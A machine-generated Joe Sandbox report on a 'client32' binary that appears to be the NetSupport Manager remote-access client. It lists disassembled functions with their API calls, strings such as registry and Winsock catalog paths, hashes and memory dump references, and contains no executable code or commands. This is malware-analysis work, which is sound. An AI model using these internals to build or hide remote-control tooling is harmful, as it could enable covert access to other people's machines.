                                                                              • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                              • API String ID: 1170620360-4157686185
                                                                              • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                              • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                              Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strtok.LIBCMT ref: 11027286
                                                                              • _strtok.LIBCMT ref: 110272C0
                                                                              • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$Sleep
                                                                              • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                              • API String ID: 2009458258-3774545468
                                                                              • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                              • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                              Function 6EEF8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6EF067B5), ref: 6EEF8D6B
                                                                                • Part of subcall function 6EEF4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6EEF8DC8), ref: 6EEF4F78
                                                                              • GetCurrentProcessId.KERNEL32 ref: 6EEF8DCB
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6EEF8DD8
                                                                              • FreeLibrary.KERNEL32(?), ref: 6EEF8EBF
                                                                                • Part of subcall function 6EEF4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6EEF4FC4
                                                                                • Part of subcall function 6EEF4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6EEF8E0D,00000000,?,6EEF8E0D,00000000,?,00000FA0,?), ref: 6EEF4FE4
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6EEF8EAE
                                                                                • Part of subcall function 6EEF5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6EEF5014
                                                                                • Part of subcall function 6EEF5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF5034
                                                                                • Part of subcall function 6EEF2420: _strrchr.LIBCMT ref: 6EEF242E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$AddressFileLibraryModuleNameProc$ChangeCloseCurrentEnumFindFreeLoadModulesNotificationOpen_strrchr
                                                                              • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                              • API String ID: 3028219403-3484705551
                                                                              • Opcode ID: 97d927b9114a0c85f55d18f62d7beee886d9b8b36f1a354ed158acecccb8d9ed
                                                                              • Instruction ID: f1c261a2d17a40a3807a37c45ae8e1e30ce7eb3f7af04a92af177b3abdc99471
                                                                              • Opcode Fuzzy Hash: 97d927b9114a0c85f55d18f62d7beee886d9b8b36f1a354ed158acecccb8d9ed
                                                                              • Instruction Fuzzy Hash: 7041D971A10219DBDB20DBD2DC65FEAB37DEF45708F100459EA19A7240F7709A46CFA1
                                                                              Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                              • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                              • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                              • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                              • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                              • CloseDesktop.USER32(00000000), ref: 11103829
                                                                              • GetLastError.KERNEL32 ref: 11103831
                                                                              • CloseDesktop.USER32(00000000), ref: 11103847
                                                                              • GetLastError.KERNEL32 ref: 1110384F
                                                                              Strings
                                                                              • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                              • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                              • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                              • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                              • API String ID: 2036220054-60805735
                                                                              • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                              • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                              Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                              • GetLastError.KERNEL32 ref: 1115F275
                                                                              • wsprintfA.USER32 ref: 1115F288
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                              • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                              • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                              • API String ID: 1734919802-1728070458
                                                                              • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                              • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                              • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                              • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                              Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 11110E4A
                                                                              • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                              • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                              • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                              • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                              • API String ID: 1976012330-1024648535
                                                                              • Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                              • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                              • Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                              • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                              Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,EE49F673,00000000,?), ref: 1115C927
                                                                              • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                              • wsprintfW.USER32 ref: 1115C967
                                                                              • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                              • wsprintfW.USER32 ref: 1115CA27
                                                                              • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                              • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                              • API String ID: 3050498177-823534439
                                                                              • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                              • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                              • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                              • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                              Function 6EF10D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6EF10F2B,94E48BC1,00000000,?,?,6EF2F278,000000FF,?,6EEFAE0A,?,00000000,?,00000080), ref: 6EF10D48
                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6EF10D5B
                                                                              • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6EF3CB4C,?,?,6EF2F278,000000FF,?,6EEFAE0A,?,00000000,?,00000080), ref: 6EF10D76
                                                                              • _malloc.LIBCMT ref: 6EF10D8C
                                                                                • Part of subcall function 6EF11B69: __FF_MSGBANNER.LIBCMT ref: 6EF11B82
                                                                                • Part of subcall function 6EF11B69: __NMSG_WRITE.LIBCMT ref: 6EF11B89
                                                                                • Part of subcall function 6EF11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6EF1D3C1,6EF16E81,00000001,6EF16E81,?,6EF1F447,00000018,6EF37738,0000000C,6EF1F4D7), ref: 6EF11BAE
                                                                              • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6EF2F278,000000FF,?,6EEFAE0A,?,00000000,?), ref: 6EF10D9F
                                                                              • _free.LIBCMT ref: 6EF10D84
                                                                                • Part of subcall function 6EF11BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6EF11C13
                                                                                • Part of subcall function 6EF11BFD: GetLastError.KERNEL32(00000000), ref: 6EF11C25
                                                                              • _free.LIBCMT ref: 6EF10DAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                              • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                              • API String ID: 1360380336-1843585929
                                                                              • Opcode ID: bc17f9a7ca481b797acbeef5794fa28781dc4c195dc8179eca69843d49917729
                                                                              • Instruction ID: ea28e859b89875d951d2c91b799e64ceb498b718d2cafe4db6237d8382de4fed
                                                                              • Opcode Fuzzy Hash: bc17f9a7ca481b797acbeef5794fa28781dc4c195dc8179eca69843d49917729
                                                                              • Instruction Fuzzy Hash: 6201F7B5204306ABE6708BB08CA8FD777AC9F41B00F10481DF5658F280FAB1F444C760
                                                                              Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              • _memset.LIBCMT ref: 11146055
                                                                              • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 4251163631-545709139
                                                                              • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                              • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                              • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                              • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                              Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1101567A
                                                                              • _memset.LIBCMT ref: 110156BE
                                                                              • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                              Strings
                                                                              • PackedCatalogItem, xrefs: 110156E2
                                                                              • %012d, xrefs: 11015674
                                                                              • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                              • NSLSP, xrefs: 11015708
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue_memsetwsprintf
                                                                              • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                              • API String ID: 1333399081-1346142259
                                                                              • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                              • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                              • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                              • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
